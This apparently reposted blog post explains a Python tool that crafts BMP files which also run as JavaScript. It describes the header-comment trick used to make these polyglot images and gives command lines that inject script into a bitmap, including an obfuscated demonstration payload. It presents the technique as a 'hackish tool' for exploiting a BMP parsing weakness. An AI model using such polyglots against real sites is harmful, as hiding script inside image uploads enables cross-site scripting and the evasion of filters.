Executing this file you'll find out this result:
As you can see, both tags succesfully executed. The Image tag is showing the red Bitmap file and the script tag is doing its job by executing a JavaScript. How is it possible ? How did you write such a file ? The following images show more details about the dirty code who generates these beautiful bitmap files.
The creation procedure.
The substitution procedure.
This is not magic at all. This is just my implementation of the BMP parsing bug many libraries have. The idea behind this python code is to create a valid BMP header within \x2F\x2A (aka \*) and then close up the end of the image through a \x2A\x2F (aka *\). To be a valid JavaScript file, you need to use the --not used-- header (\x42\x4D) as a variable and/or as a part of the code. This is why before the payload you might inject a simple expression like "=1;" or more commonly used "=a;" The following image shows the first part of a forget BMP header to exploit this eakness.
Run-it as: bmp.py -i image.bmp "alert(\"test\");"
python bmp.py -i 2.bmp "var _0x9c4c=[\"\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\",\"\x0A\",\"\x4F\x4B\"];var a=_0x9c4c[0];function MsgBox(_0xccb4x3){alert(_0xccb4x3+_0x9c4c[1]+a);} ;MsgBox(_0x9c4c[2]);"
Enjoy your new hackish tool !
출처 : marcoramilli.blogspot.com.es
댓글